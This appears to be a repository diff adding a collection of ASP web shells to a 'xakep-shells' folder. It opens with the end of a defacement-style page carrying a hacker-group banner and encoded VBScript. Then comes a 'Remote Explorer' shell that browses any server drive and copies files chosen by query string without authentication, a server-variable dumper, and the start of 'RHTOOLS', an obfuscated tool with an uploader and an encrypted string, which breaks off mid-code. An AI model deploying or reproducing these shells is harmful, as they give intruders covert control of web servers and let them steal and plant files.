|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
|
||||
A:link {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A:active {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A:visited {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A.postlink {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A:hover {
|
||||
COLOR: #dd6900
|
||||
}
|
||||
.bodyline {
|
||||
BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
|
||||
}
|
||||
INPUT {
|
||||
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
|
||||
}
|
||||
TEXTAREA {
|
||||
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
|
||||
}
|
||||
SELECT {
|
||||
BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
|
||||
}
|
||||
IMG {
|
||||
BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
|
||||
}
|
||||
TH {
|
||||
PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
|
||||
}
|
||||
TD.cat {
|
||||
FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
|
||||
}
|
||||
.title {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.content {
|
||||
BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
|
||||
}
|
||||
.block-title {
|
||||
FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
|
||||
}
|
||||
.storytitle {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.storycat {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
|
||||
}
|
||||
.boxtitle {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.boxcontent {
|
||||
FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
|
||||
}
|
||||
.option {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.ok {
|
||||
FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
|
||||
}</style><style><!--
|
||||
body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
|
||||
}
|
||||
// --></style><%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>
|
||||
|
||||
<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></center>
|
||||
<font color=lime>
|
||||
<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
|
||||
<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
|
||||
|
||||
|
||||
</textarea>
|
||||
<noscript><noscript><plaintext><plaintext>
|
||||
<!--
|
||||
|
||||
HACKING
|
||||
|
||||
www.infilak.tr.cx
|
||||
Mehdi & HolyDemon
|
||||
INF TEAM DURMAZ , DURDURULAMAZ
|
||||
Hak Geldi Batýl Zail Oldu..
|
||||
-->
|
250
xakep-shells/ASP/RemExp.asp.txt
Normal file
250
xakep-shells/ASP/RemExp.asp.txt
Normal file
|
@ -0,0 +1,250 @@
|
|||
<%@ Language=VBScript %>
|
||||
<%
|
||||
Option Explicit
|
||||
|
||||
Dim giCount
|
||||
Dim gvAttributes
|
||||
|
||||
Dim Ext
|
||||
|
||||
Dim ScriptFolder
|
||||
Dim FolderPath
|
||||
|
||||
Dim FileSystem
|
||||
Dim Drives
|
||||
Dim Drive
|
||||
Dim Folders
|
||||
Dim Folder
|
||||
Dim SubFolders
|
||||
Dim SubFolder
|
||||
Dim Files
|
||||
Dim File
|
||||
|
||||
Dim BgColor, BackgroundColor,FSO
|
||||
|
||||
If Request.QueryString("CopyFolder") <> "" Then
|
||||
Set FSO = CreateObject("Scripting.FileSystemObject")
|
||||
FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
|
||||
End If
|
||||
|
||||
If Request.QueryString("CopyFile") <> "" Then
|
||||
Set FSO = CreateObject("Scripting.FileSystemObject")
|
||||
FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
|
||||
End If
|
||||
|
||||
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
FolderPath = Request.QueryString("FolderPath")
|
||||
|
||||
If FolderPath = "" Then
|
||||
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
|
||||
End If
|
||||
|
||||
FolderPath = ParseFolder(FolderPath)
|
||||
|
||||
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
|
||||
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<title>Remote Explorer</title>
|
||||
<style type="text/css">
|
||||
BODY
|
||||
{
|
||||
BACKGROUND-COLOR: #C0C0C0
|
||||
FONT-FAMILY: 'MS Sans Serif', Arial;
|
||||
FONT-SIZE: 8px;
|
||||
MARGIN: 0px
|
||||
}
|
||||
td, input, select
|
||||
{
|
||||
FONT-FAMILY: 'MS Sans Serif', Arial;
|
||||
FONT-SIZE: 8px;
|
||||
}
|
||||
.Address
|
||||
{
|
||||
BACKGROUND-ATTACHMENT: fixed;
|
||||
BACKGROUND-POSITION: 1px center;
|
||||
BACKGROUND-REPEAT: no-repeat;
|
||||
Padding-LEFT: 10px
|
||||
}
|
||||
.Go
|
||||
{
|
||||
BACKGROUND-ATTACHMENT: fixed;
|
||||
BACKGROUND-POSITION: left center;
|
||||
BACKGROUND-REPEAT: no-repeat;
|
||||
Padding-LEFT: 10px
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body bgcolor="#c0c0c0">
|
||||
<table width="100%" cellpadding="0" cellspacing="0" border="0">
|
||||
<tr>
|
||||
<form>
|
||||
<td width="1%" nowrap>
|
||||
<select name="FolderPath" id="Drive">
|
||||
<%
|
||||
Set Drives = FileSystem.Drives
|
||||
For Each Drive In Drives
|
||||
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
|
||||
If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
|
||||
Response.Write ">"
|
||||
Response.Write Drive.DriveLetter & " - "
|
||||
If Drive.DriveType = "Remote" Then
|
||||
Response.Write Drive.ShareName & " [share]"
|
||||
ElseIf Drive.DriveLetter <> "A" Then
|
||||
If Drive.IsReady Then
|
||||
Response.Write Drive.VolumeName
|
||||
Else
|
||||
Response.Write "(Not Ready)"
|
||||
End If
|
||||
Else
|
||||
Response.Write "(Skiped Detection)"
|
||||
End If
|
||||
Response.Write "</OPTION>"
|
||||
Next
|
||||
%>
|
||||
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
|
||||
</td>
|
||||
</form>
|
||||
<td width="1%"> Address: </td>
|
||||
<form>
|
||||
<td width="100%">
|
||||
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
|
||||
</td>
|
||||
<td width="1%">
|
||||
<input class="Go" type="submit" value="Go"style="border:1px outset">
|
||||
</td>
|
||||
</form>
|
||||
</tr>
|
||||
</table>
|
||||
<%
|
||||
Set Folder = FileSystem.GetFolder(FolderPath)
|
||||
Set SubFolders = Folder.SubFolders
|
||||
Set Files = Folder.Files
|
||||
%>
|
||||
<br>
|
||||
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
|
||||
<tr>
|
||||
<td width="40%" height="20" bgcolor="silver"> Name</td>
|
||||
<td width="10%" bgcolor="silver" align="right">Size </td>
|
||||
<td width="20%" bgcolor="silver">Type </td>
|
||||
<td width="20%" bgcolor="silver">Modified </td>
|
||||
<td width="10%" bgcolor="silver" align="right">Attributes </td>
|
||||
</tr>
|
||||
<%
|
||||
If Not Folder.IsRootFolder Then
|
||||
BgToggle
|
||||
%>
|
||||
<tr title="Top Level">
|
||||
<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
</tr>
|
||||
<%BgToggle%>
|
||||
<tr>
|
||||
<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
</tr>
|
||||
<%
|
||||
End If
|
||||
For Each SubFolder In SubFolders
|
||||
BgToggle
|
||||
%>
|
||||
<tr>
|
||||
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a> (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
|
||||
<td bgcolor="<%=BgColor%>"> </td>
|
||||
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
|
||||
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
|
||||
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
|
||||
</tr>
|
||||
<%
|
||||
Next
|
||||
For Each File In Files
|
||||
BgToggle
|
||||
Ext = FileExtension(File.Name)
|
||||
%>
|
||||
<tr>
|
||||
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
|
||||
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
|
||||
<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
|
||||
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
|
||||
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
|
||||
</tr>
|
||||
<%Next%>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
<%
|
||||
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
|
||||
Dim lsResult
|
||||
Dim llTemp
|
||||
Dim giCount
|
||||
MaxValuePerIndex = MaxValuePerIndex + 1
|
||||
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
|
||||
MinUpperBound = MinUpperBound + 1
|
||||
Loop
|
||||
For giCount = MinUpperBound To 0 Step -1
|
||||
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
|
||||
lsResult = lsResult & CStr(llTemp)
|
||||
If giCount > 0 Then lsResult = lsResult & IndexSeperator
|
||||
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
|
||||
Next
|
||||
ConvertBinary = lsResult
|
||||
End Function
|
||||
|
||||
Private Sub BgToggle()
|
||||
BackgroundColor = Not(BackgroundColor)
|
||||
If BackgroundColor Then
|
||||
BgColor = "#efefef"
|
||||
Else
|
||||
BgColor = "#ffffff"
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Function Attributes(AttributeValue)
|
||||
Dim lvAttributes
|
||||
Dim lsResult
|
||||
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
|
||||
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
|
||||
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
|
||||
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
|
||||
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
|
||||
Attributes = lsResult
|
||||
End Function
|
||||
|
||||
Private Function FileExtension(FileName)
|
||||
Dim lsExt
|
||||
Dim liCount
|
||||
For liCount = Len(FileName) To 1 Step -1
|
||||
If Mid(FileName, liCount, 1) = "." Then
|
||||
lsExt = Right(FileName, Len(FileName) - liCount)
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
|
||||
lsExt = ""
|
||||
End If
|
||||
FileExtension = lsExt
|
||||
End Function
|
||||
|
||||
Private Function ParseFolder(PathString)
|
||||
Dim liCount
|
||||
If Right(PathString, 1) = "\" Then
|
||||
ParseFolder = PathString
|
||||
Else
|
||||
For liCount = Len(PathString) To 1 Step -1
|
||||
If Mid(PathString, liCount, 1) = "\" Then
|
||||
ParseFolder = Left(PathString, liCount)
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
End If
|
||||
End Function
|
||||
%>
|
||||
|
27
xakep-shells/ASP/Server Variables.asp.txt
Normal file
27
xakep-shells/ASP/Server Variables.asp.txt
Normal file
|
@ -0,0 +1,27 @@
|
|||
<%
|
||||
Dim Vars
|
||||
%>
|
||||
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server
|
||||
variables : </strong> </font></p>
|
||||
<p><BR>
|
||||
<BR>
|
||||
</p>
|
||||
<TABLE width="75%" BORDER=1 align="center" cellpadding="3" cellspacing="0">
|
||||
<TR>
|
||||
<TD width="149"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server
|
||||
Variable Name</B></font></p>
|
||||
</TD>
|
||||
<TD width="333"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server
|
||||
Variable Value</B></font></p>
|
||||
</TD>
|
||||
</TR>
|
||||
<% For Each Vars In Request.ServerVariables %>
|
||||
<TR>
|
||||
<TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Vars %></FONT></TD>
|
||||
<TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Request.ServerVariables(Vars) %> </FONT></TD>
|
||||
</TR>
|
||||
<% Next %>
|
||||
</TABLE>
|
792
xakep-shells/ASP/Tool.asp.txt
Normal file
792
xakep-shells/ASP/Tool.asp.txt
Normal file
|
@ -0,0 +1,792 @@
|
|||
<%@ LANGUAGE = VBScript.Encode %>
|
||||
<%
|
||||
On Error Resume Next
|
||||
Server.ScriptTimeOut = 7200
|
||||
Class FileUploader
|
||||
Public Files
|
||||
Private mcolFormElem
|
||||
Private Sub Class_Initialize()
|
||||
Set Files = Server.CreateObject("Scripting.Dictionary")
|
||||
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
|
||||
End Sub
|
||||
Private Sub Class_Terminate()
|
||||
If IsObject(Files) Then
|
||||
Files.RemoveAll()
|
||||
Set Files = Nothing
|
||||
End If
|
||||
If IsObject(mcolFormElem) Then
|
||||
mcolFormElem.RemoveAll()
|
||||
Set mcolFormElem = Nothing
|
||||
End If
|
||||
End Sub
|
||||
Public Property Get Form(sIndex)
|
||||
Form = ""
|
||||
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
|
||||
End Property
|
||||
Public Default Sub Upload()
|
||||
Dim biData, sInputName
|
||||
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
|
||||
Dim nPosFile, nPosBound
|
||||
biData = Request.BinaryRead(Request.TotalBytes)
|
||||
nPosBegin = 1
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
|
||||
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
|
||||
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
|
||||
nDataBoundPos = InstrB(1, biData, vDataBounds)
|
||||
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
|
||||
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
|
||||
nPos = InstrB(nPos, biData, CByteString("name="))
|
||||
nPosBegin = nPos + 6
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
|
||||
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
|
||||
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
|
||||
If nPosFile <> 0 And nPosFile < nPosBound Then
|
||||
Dim oUploadFile, sFileName
|
||||
Set oUploadFile = New UploadedFile
|
||||
nPosBegin = nPosFile + 10
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
|
||||
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
|
||||
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
|
||||
nPosBegin = nPos + 14
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
|
||||
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
nPosBegin = nPosEnd+4
|
||||
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
|
||||
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
|
||||
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
|
||||
Else
|
||||
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
|
||||
nPosBegin = nPos + 4
|
||||
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
|
||||
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
End If
|
||||
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
|
||||
Loop
|
||||
End Sub
|
||||
Private Function CByteString(sString)
|
||||
Dim nIndex
|
||||
For nIndex = 1 to Len(sString)
|
||||
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
|
||||
Next
|
||||
End Function
|
||||
Private Function CWideString(bsString)
|
||||
Dim nIndex
|
||||
CWideString =""
|
||||
For nIndex = 1 to LenB(bsString)
|
||||
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
|
||||
Next
|
||||
End Function
|
||||
End Class
|
||||
Class UploadedFile
|
||||
Public ContentType
|
||||
Public FileName
|
||||
Public FileData
|
||||
Public Property Get FileSize()
|
||||
FileSize = LenB(FileData)
|
||||
End Property
|
||||
Public Sub SaveToDisk(sPath)
|
||||
Dim oFS, oFile
|
||||
Dim nIndex
|
||||
If sPath = "" Or FileName = "" Then Exit Sub
|
||||
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
|
||||
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
|
||||
If Not oFS.FolderExists(sPath) Then Exit Sub
|
||||
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
|
||||
For nIndex = 1 to LenB(FileData)
|
||||
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
|
||||
Next
|
||||
oFile.Close
|
||||
End Sub
|
||||
Public Sub SaveToDatabase(ByRef oField)
|
||||
If LenB(FileData) = 0 Then Exit Sub
|
||||
If IsObject(oField) Then
|
||||
oField.AppendChunk FileData
|
||||
End If
|
||||
End Sub
|
||||
End Class
|
||||
key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
|
||||
startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
|
||||
endocde = "</body></html>"
|
||||
onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
|
||||
Function DeCryptString(strCryptString)
|
||||
Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
|
||||
strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
|
||||
intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
|
||||
intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
|
||||
strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
|
||||
arHexCharSet = Split(strHexCrypData, Hex(intKey))
|
||||
For i=0 to UBound(arHexCharSet)
|
||||
strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
|
||||
Next
|
||||
DeCryptString = CStr(strRAW)
|
||||
End Function
|
||||
Function HexConv(hexVar)
|
||||
Dim hxx, hxx_var, multiply
|
||||
IF hexVar <> "" THEN
|
||||
hexVar = UCASE(hexVar)
|
||||
hexVar = StrReverse(hexVar)
|
||||
DIM hx()
|
||||
REDIM hx(LEN(hexVar))
|
||||
hxx = 0
|
||||
hxx_var = 0
|
||||
FOR hxx = 1 TO LEN(hexVar)
|
||||
IF multiply = "" THEN multiply = 1
|
||||
hx(hxx) = mid(hexVar,hxx,1)
|
||||
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
|
||||
multiply = (multiply * 16)
|
||||
NEXT
|
||||
hexVar = hxx_var
|
||||
HexConv = hexVar
|
||||
END IF
|
||||
End Function
|
||||
cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)© BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
|
||||
Function get_hxno(ghx)
|
||||
If ghx = "A" Then
|
||||
ghx = 10
|
||||
ElseIf ghx = "B" Then
|
||||
ghx = 11
|
||||
ElseIf ghx = "C" Then
|
||||
ghx = 12
|
||||
ElseIf ghx = "D" Then
|
||||
ghx = 13
|
||||
ElseIf ghx = "E" Then
|
||||
ghx = 14
|
||||
ElseIf ghx = "F" Then
|
||||
ghx = 15
|
||||
End If
|
||||
get_hxno = ghx
|
||||
End Function
|
||||
keydec = DeCryptString(key)
|
||||
Function showobj(objpath)
|
||||
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
|
||||
End Function
|
||||
Function showobjpath(objpath)
|
||||
showobjpath = Left(objpath,InstrRev(objpath,"\"))
|
||||
End Function
|
||||
Function checking(a,b)
|
||||
If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
|
||||
pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
|
||||
Response.Redirect(pagina)
|
||||
End If
|
||||
End Function
|
||||
Sub hdr()
|
||||
Response.Write startcode
|
||||
Response.Write keydec
|
||||
Response.Write "<br>"
|
||||
End Sub
|
||||
Sub showcontent()
|
||||
